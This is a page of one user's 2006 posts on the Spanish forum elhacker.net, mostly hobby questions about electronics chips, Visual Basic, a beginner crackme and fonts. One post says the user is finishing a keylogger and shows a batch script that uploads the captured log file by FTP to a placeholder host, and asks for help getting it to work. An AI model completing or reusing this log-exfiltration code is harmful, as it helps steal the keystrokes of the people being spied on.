elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Temas
Páginas: 1 2 3 4 [5] 6 7 8 9 10
41  Foros Generales / Sugerencias y dudas sobre el Foro / ¿Y mis post?Algo raro pasa... :S en: 25 Febrero 2006, 00:11 am
Pues estoy mirando, y acabo de ver que faltan mis ultimos post,...

He intentado responder un tema en "Electronica" y me dice que se acaba de responder el tema...pero cojo y miro...y no ahi ninguno  :-\, sale uno mio de otro dia...le vuelvo a dar y se van almacenando pero no se ven....

El foro esta fallando mas que una escopeta caña xD

Pd: Saldra este post?  :rolleyes:
42  Informática / Electrónica / ¿Que es esto? en: 21 Febrero 2006, 19:26 pm
Pues hoy en mi clase de Tecnologia he visto un par de microchips y me los he traido xD (me llaman mucho la atencion)

Es marron, con 14 patillas a cada lado, un total de 28 patillas.
En el medio tiene un circulo transparente en el cual te muestra parte de lo interior.

Tiene esto escrito:

NEC   JAPAN
D27C256AD-15
PGM@ 12.5V
8752HX011

Perdonad por no poner fotos, pero es que no lo he visto por internet y mi camara es muy mala... :P

Solo queria saber para que sirve, la utilizacion y demas cosas...

Pd: Lo unica info que encontre en internet estaba en aleman xD

Un saludo
43  Programación / Programación Visual Basic / Enviar logs... en: 21 Febrero 2006, 19:20 pm
Pues estoy terminando un keylogger y ahora estoy con eso de enviar los logs..

He probado por ftp en batch e inet, y ninguno me han funcionado...

Código:
@echo off
echo TUNOMBRE > C:\datos.txt
echo TUPASS >> C:\datos.txt
echo put C:\datos.txt datos.txt >> C:\datos.txt
echo put C:\archivodelkeyloger keylogger >> C:\datos.txt
echo bye  >> C:\datos.txt
ftp -s:C:\datos.txt ftp.TUFTP.com
exit

Shell "cmd.exe /c ftp -s:C:\text.txt ftp://host.com"


Aver si alguien me puede ayudar con algun code...

Un saludo
44  Programación / Ingeniería Inversa / Mi primer Crackme 1.0 en: 14 Febrero 2006, 17:59 pm
Acabo de crear un Crackme, es la primera vez que hago uno...es para novatos, al menos eso creo yo  :rolleyes:
Pues yo mismo no se como crackearlo, solo se hacerlo xD  :P

Espero sus opiniones, fallos del crackme, etc.

Todos aquellos que consigan el pass, que me lo manden por privado...NO por aqui

CrackMe 1.0 by BenRu:

http://rapidshare.de/files/13265230/CrackMe_1.0.rar.html

Un saludo

Acertantes del Serial
Cara_Webo
Wan_Kenobi
pERICOTE 
OberonCracker
45  Informática / Electrónica / Automata programable LOGO-230RC de Siemens en: 31 Enero 2006, 15:59 pm
Hola.
En mi libro de tecnologia, en el tema de robotica, salen lenguajes de programacion de robots.
Ahi un apartado llamado Programacion de Automatas (PLCs), en el cual incluye Automata programable LOGO-230RC de Siemens , funciones basicas, funciones especiales, un ejemplo de programacion.

Alguien me puede hablar un poco mas sobre esto?El modulo LOGO se puede conectar al pc, se puede programar en Visual Basic o empleando el codigo RCX.

Que precio tiene eso?existen cosas similares a nivel usuario?

Una foto:




Otra cosa es WinLogo, una de las formas mas conocidas y sencillas de programar en LOGO (segun mi libro)
Pag Oficial: www.wlogo.com

46  Programación / Programación Visual Basic / Error al declarar variables. Ayuda en: 28 Enero 2006, 17:44 pm
Pues estoy haciendo un programa que conecta por ftp, pero me da el siguiente error:

Código:
Sub RellenarListView()
  On Error GoTo RutinaError
  Dim nFicheros As Long, i As Long
  Dim sFicheros() As String
  Dim sFicheros1() As String, n As Integer
  Dim ElementoLista As ListItem

Sub RellenarListView() se colorea de amarillo y Dim ElementoLista As ListItem se queda marcado.

Tengo un ListBox con el nombre de ListItem, pero sige dando el mismo error...

Que puede pasar?
47  Programación / Programación Visual Basic / Ralla intermitente de msdos en vb en: 27 Enero 2006, 22:07 pm
Aqui vuelvo con otra duda mas, se que esto ya lo han puesto, pero segun el buscador no esta...

Una vez slasher keeper puso un code...haber si alguien me lo puede pasar.

Pd: En google no sale nada
48  Programación / Programación Visual Basic / Ejecutar boton al pulsar enter... en: 27 Enero 2006, 17:26 pm
Me da un poco de verguenza preguntar esto, se que es una tonteria pero estoy atascado y no me deja seguir con mi proyecto.

Me gustaria que al pulsar enter, estando en un textbox, ejecute un boton..

Gracias y un saludo
49  Media / Diseño Gráfico / ¿De donde puedo sacar esta font? en: 18 Enero 2006, 14:42 pm
Necesito la font Coronet, me he metido en dafont.com pero ahi que pagar unos 20$ para poder adquirirla...

Alguien sabe donde puede estar, o poder pasarmela?

Un saludo!
50  Programación / Programación Visual Basic / Autocrear exe en: 8 Enero 2006, 04:58 am
Me gustaria saber si en una aplicacion de visual basic, esta misma fuese capaz de crear un exe dependiendo del codigo que alla en un boton o textbox...es posible sin vc++?

Un saludo
Páginas: 1 2 3 4 [5] 6 7 8 9 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines